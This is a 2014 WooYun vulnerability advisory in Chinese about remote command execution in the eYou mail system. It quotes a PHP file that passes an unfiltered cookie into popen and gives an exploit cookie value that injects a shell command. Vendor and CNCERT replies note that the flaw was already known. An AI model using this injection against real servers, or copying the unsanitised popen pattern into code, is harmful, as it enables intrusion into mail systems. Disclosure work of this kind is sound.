当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-055122

漏洞标题:eYou邮件系统远程命令执行

相关厂商:北京亿中邮信息技术有限公司

漏洞作者: secmap

提交时间:2014-03-31 16:33

修复时间:2014-06-29 16:33

公开时间:2014-06-29 16:33

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-31: 细节已通知厂商并且等待厂商处理中
2014-04-04: 厂商已经确认,细节仅向厂商公开
2014-04-07: 细节向第三方安全合作伙伴开放
2014-05-29: 细节向核心白帽子及相关领域专家公开
2014-06-08: 细节向普通白帽子公开
2014-06-18: 细节向实习白帽子公开
2014-06-29: 细节向公众公开

简要描述:

eYou邮件系统存在远程命令执行

详细说明:

#1 漏洞代码
/grad/admin/domain_logo.php

<?php
/**修改:王磊
  *修改时间:2007-04-09
  *修改内容:判断域LOGO的路径
  *
  */
$domain = $_COOKIE['cookie'];//接收cookie值,无任何过滤
$fp = popen("/var/eyou/sbin/hashid ".$domain,'r');//直接带进了危险函数popen 执行任意命令
$res = fread($fp,1024);
header('Content-type:image/rgb');
$path = "/var/eyou/Domain/".substr($res,-5,2).$domain."/LOGO/domain_logo";
$fp = file($path);
foreach($fp as $key => $val){
        print($val);
}
exit;
?>


$domain = $_COOKIE['cookie'];
//接收cookie值,无任何过滤
$fp = popen("/var/eyou/sbin/hashid ".$domain,'r');
//直接带进了危险函数popen 可远程执行任意命令
#2 漏洞利用
访问http://secmap.cn/grad/admin/domain_logo.php
修改cookie 值为:aa|| echo test>>test.txt 刷新 便可以在该目录下生成test.txt

漏洞证明:

# 成功例子
在互联网上成功测试,如图

qqq.jpg

修复方案:

你懂的

版权声明:转载请注明来源 secmap@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-04-04 23:04

厂商回复:

根据比对,该漏洞非首报,此前已经协调亿中邮公司处置。不再进入处置流程。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-03-31 16:39 | cncert国家互联网应急中心(乌云厂商)

    这个已经是老漏洞。CNVD库以及WOOYUN均已经收录。暂不作为新漏洞确认。

  2. 2014-04-25 09:09 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    看起来很牛,但是居然是老货鸟……